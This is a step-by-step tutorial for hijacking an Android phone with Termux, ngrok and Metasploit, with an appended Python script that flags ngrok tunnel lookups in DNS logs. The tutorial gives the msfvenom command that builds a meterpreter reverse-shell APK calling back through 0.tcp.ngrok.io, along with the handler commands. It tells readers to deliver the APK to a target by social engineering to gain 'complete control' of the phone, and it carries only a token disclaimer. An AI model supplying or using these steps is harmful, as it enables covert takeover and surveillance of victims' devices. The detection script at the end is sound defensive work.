Android Hacking Using Metasploit & Ngrok (Termux)

Hello guys, through this article I want to show you how you could easily gain access to an Android device using Metasploit and ngrok in Termux.

Disclaimer: TO BE USED FOR EDUCATIONAL PURPOSE ONLY!!


So let’s get started by getting to know what Metasploit is. Metasploit is the world’s most used penetration testing framework, which enables you to find, exploit and validate vulnerabilities. It is developed by Rapid7 and is the most preferred framework for penetration testing.

So how does ngrok come into the picture?
The answer is that while testing over external (WAN) networks using Metasploit, we are required to make some complex configurations like port forwarding, having a static IP, etc. Using ngrok you can skip these complexities.

First, download Termux from the Play Store onto your Android device.


Then visit ngrok’s website and sign up for an account, and download the Linux (ARM) version to your Android phone. The file will be saved on your phone, and an activation key (the auth token) will be shown in the window. We will use it later on, so don’t close the tab.

Open Termux on your Android phone and type the command ls

If you don’t see a folder named storage, then type the following command.


termux-setup-storage


If you type the ls command again, you will see a folder named storage. To open that folder type


cd storage


Then go to the downloads folder by typing the command


cd downloads


Now if you type ls you will see all your downloads. Copy the name of the ngrok zip file and type the command


unzip (filename)


This command will unzip the file. Now move the ngrok file from downloads to the Termux home directory by typing the command


mv ngrok $HOME/


Now type


cd ~


Now you are in the Termux home directory, so you need to make the file you just moved executable by typing the command

chmod +x ngrok


Now to execute the file type


./ngrok


Now you need to authenticate your account. Copy the auth token from the page where you downloaded the ngrok zip file, and in Termux type the following


./ngrok authtoken (your auth token)


Now your account is authenticated and your token is saved in a configuration file. Now turn on the hotspot of your Android device, and to run ngrok type the command


./ngrok tcp 4543


You can provide any port; I’m using 4543. Now open a new Termux session by swiping from the left and clicking on new session. DON’T CLOSE THIS SESSION. In the new session type the command


pkg install unstable-repo


Then install Metasploit by typing the command


pkg install metasploit


The next CRUCIAL step is to create a payload. To create a payload you need to understand certain keywords associated with any Metasploit payload. The parameters of concern to us are LHOST and LPORT.



Here LHOST=0.tcp.ngrok.io (which you can see in the Forwarding row in the ngrok session) and LPORT is 17143 (the number right after the colon).

Now to create a payload using Metasploit, type the following command


msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=17143 R > sample.apk


The above command creates a payload application, which is stored in the Termux home directory. To move the application to your phone storage type


mv sample.apk /storage/emulated/0/


Now we have reached the final and most important step, which is to use the Metasploit framework to gain access to the target device. To run Metasploit type


msfconsole




NOTE: THE NGROK SESSION MUST ALWAYS BE ONLINE THROUGHOUT THE PROCESS.


You can send the apk file to your target by any means either by social engineering or any other method.

Now in the Metasploit session type in the following commands one by one


use exploit/multi/handler


set payload android/meterpreter/reverse_tcp


set LHOST localhost


set LPORT 4543


The above commands are the same for everyone if you used the same port as I did. Now finally type


exploit


By this time you will be listening for connections on the specified port. Now when the target device installs the application you created, it establishes a connection back to you and you gain complete control over the target phone.

When a connection is established you will see a screen like this



In the Meterpreter session you can type the command help to show all the available options and explore the commands.

Congratulations, you have successfully learned how to hack into a target Android device over WAN using Metasploit and ngrok.
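
Added example (not part of the original article): the payload built above calls back to the ngrok forwarding hostname, so a phone running it has to resolve a name like 0.tcp.ngrok.io before it connects. The Python script below flags such lookups in resolver logs; the dnsmasq-style log lines, the client IPs and the regional hostname form (e.g. 4.tcp.eu.ngrok.io) are constructed assumptions that go beyond what the article shows.

```python
import re
from collections import defaultdict

# Constructed sample resolver log in dnsmasq "query" format (not real traffic).
SAMPLE_LOG = """\
Mar  3 10:15:01 dnsmasq[811]: query[A] play.googleapis.com from 192.168.43.21
Mar  3 10:15:07 dnsmasq[811]: query[A] 0.tcp.ngrok.io from 192.168.43.21
Mar  3 10:15:09 dnsmasq[811]: query[AAAA] 0.TCP.ngrok.io. from 192.168.43.21
Mar  3 10:16:40 dnsmasq[811]: query[A] 4.tcp.eu.ngrok.io from 192.168.43.35
Mar  3 10:17:02 dnsmasq[811]: query[A] 0.tcp.ngrok.io.example.net from 192.168.43.40
Mar  3 10:17:30 dnsmasq[811]: query[A] docs.ngrok.io from 192.168.43.40
Mar  3 10:18:00 dnsmasq[811]: reply 0.tcp.ngrok.io is 203.0.113.10
"""

# Only "query[...] <name> from <client>" lines are lookups made by a device.
QUERY_RE = re.compile(r"query\[(?P<qtype>[A-Z]+)\] (?P<name>\S+) from (?P<client>\S+)$")
# <digits>.tcp.ngrok.io as on the page, plus an optional two-letter region
# label (assumption beyond the page). Anchored so look-alike suffixes fail.
TUNNEL_RE = re.compile(r"^\d+\.tcp\.(?:[a-z]{2}\.)?ngrok\.io$")


def normalize(name: str) -> str:
    """DNS names are case-insensitive and may carry a trailing root dot."""
    return name.lower().rstrip(".")


def is_ngrok_tcp_endpoint(name: str) -> bool:
    """True only for ngrok TCP tunnel hostnames, not other ngrok.io names."""
    return bool(TUNNEL_RE.match(normalize(name)))


def find_tunnel_clients(log_text: str) -> dict:
    """Map each client IP to the sorted tunnel hostnames it looked up."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        m = QUERY_RE.search(line)
        if m and is_ngrok_tcp_endpoint(m["name"]):
            hits[m["client"]].add(normalize(m["name"]))
    return {client: sorted(names) for client, names in hits.items()}


if __name__ == "__main__":
    for client, names in find_tunnel_clients(SAMPLE_LOG).items():
        print(f"ALERT {client} resolved ngrok TCP tunnel endpoint(s): {', '.join(names)}")
```

A hit is a lead to investigate rather than proof of compromise, since developers also use ngrok TCP tunnels for legitimate testing.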